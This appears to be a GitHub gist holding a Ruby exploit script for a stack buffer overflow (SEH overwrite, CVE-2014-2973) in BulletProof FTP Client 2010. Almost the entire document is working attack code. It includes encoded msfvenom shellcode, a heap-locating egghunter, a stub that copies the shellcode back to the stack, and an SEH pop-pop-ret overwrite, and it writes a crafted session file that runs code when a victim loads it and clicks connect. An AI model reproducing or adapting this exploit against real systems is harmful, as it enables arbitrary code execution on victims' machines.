Created
December 9, 2014 15:17
-
-
Save mfadzilr/c8980087db10c47bdfb6 to your computer and use it in GitHub Desktop.
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit v2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit | |
| # Date: Dec 03 2014 | |
| # Vulnerability Discovery: Gabor Seljan | |
| # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com> | |
| # Software Link: http://www.bpftp.com/ | |
| # Version: 2010.75.0.76 | |
| # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600] | |
| # CVE: CVE-2014-2973 | |
| # Notes: bypass buffer size limitation for bigger payload. Allocate 2nd | |
| # shellcode in heap and copy back to stack. This exploit use egghunter | |
| # to locate 2nd shellcode in heap and copy to stack. Load the exploit file | |
| # and click connect to trigger the exploit. | |
| # Offset | |
| seh = 93 | |
| filename = "xsession.bps" | |
| buff = "A" * 500 | |
| # ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby | |
| heap_sc = | |
| "w00tw00t" + | |
| "\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9" + | |
| "\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10" + | |
| "\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41" + | |
| "\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1" + | |
| "\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c" + | |
| "\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba" + | |
| "\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09" + | |
| "\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83" + | |
| "\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef" + | |
| "\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb" + | |
| "\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80" + | |
| "\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f" + | |
| "\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6" + | |
| "\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28" + | |
| "\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6" + | |
| "\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20" + | |
| "\x3b\x6b" | |
| # badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2' | |
| # find 1st heap address | |
| heap_addr = | |
| "\x50" + # push eax | |
| "\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh | |
| "\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777f = 0x30 (TEB) | |
| "\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx] | |
| "\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh | |
| "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh = 0x90 (PEB) | |
| "\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx] | |
| "\x8b\x1b" # mov ebx,dword ptr [ebx] | |
| egghunter = | |
| "\x8b\xd3" + # mov edx,ebx | |
| "\xeb\x05" + # jmp $+0x5 (#2) | |
| "\x66\x81\xca\xff\x0f" + # or dx, 0xfff (#1) | |
| "\x42" + # inc edx (#2) | |
| "\x52" + # push edx | |
| "\x6a\x02" + # push 2 | |
| "\x58" + # pop eax | |
| "\xcd\x2e" + # int 0x2e | |
| "\x3c\x05" + # cmp al,5 | |
| "\x5a" + # pop edx | |
| "\x74\xef" + # je $-0xf (#1) | |
| "\xb8\x77\x30\x30\x74" + # mov eax,0x74303077 (our tag 'w00t') | |
| "\x8b\xfa" + # mov edi,edx | |
| "\xaf" + # scasd eax, dword ptr es:[edi] | |
| "\x75\xea" + # jne $-0x14 (#2) | |
| "\xaf" + # scasd eax, dword ptr es:[edi] | |
| "\x75\xe7" + # jne $-0x17 (#2) | |
| copy_sc = | |
| "\x58" + # pop eax | |
| "\x05\x54\xf2\xff\xff" + # add eax,-3500 | |
| "\x89\xfe" + # mov esi,edi | |
| "\x89\xc7" + # mov edi,eax | |
| "\xb9\x61\x78\x77\x77" + # mov ecx,0x77777861 | |
| "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f | |
| "\xf2\xa4" + # rep movsb | |
| "\xff\xe0" # jmp eax | |
| stack_sc = heap_addr + egghunter + copy_sc | |
| # GetPC | |
| buff[1,2] = "\xd9\xeb" # fldpi | |
| buff[3,5] = "\x9b\xd9\x74\x24\xf4" # fstenv [esp-0xc] | |
| buff[8,1] = "\x58" # pop eax # pop esp into eax | |
| # FixRet stub | |
| buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45" # (1) | |
| buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp | |
| buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr | |
| buff[30,stack_sc.size] = stack_sc | |
| # repair stack | |
| buff[12,4] = buff[seh-24,4] # replace with original sc (1) | |
| buff[19,4] = buff[seh-4,4] # replace with original sc (2) | |
| buff[26,4] = buff[seh,4] # replace with original sc (3) | |
| buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166 | |
| buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null | |
| bps = | |
| "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" + | |
| "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" + | |
| "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" + | |
| "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" + | |
| "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" + | |
| "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" + | |
| "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" + | |
| buff + "\x0D\x0A\x61\x6E" + | |
| "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" + | |
| "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" + | |
| "\x0A" | |
| File.open(filename,"wb") do |fp| | |
| fp.write(bps) | |
| puts "Exploit file: #{filename} size: #{bps.size}" | |
| fp.close | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment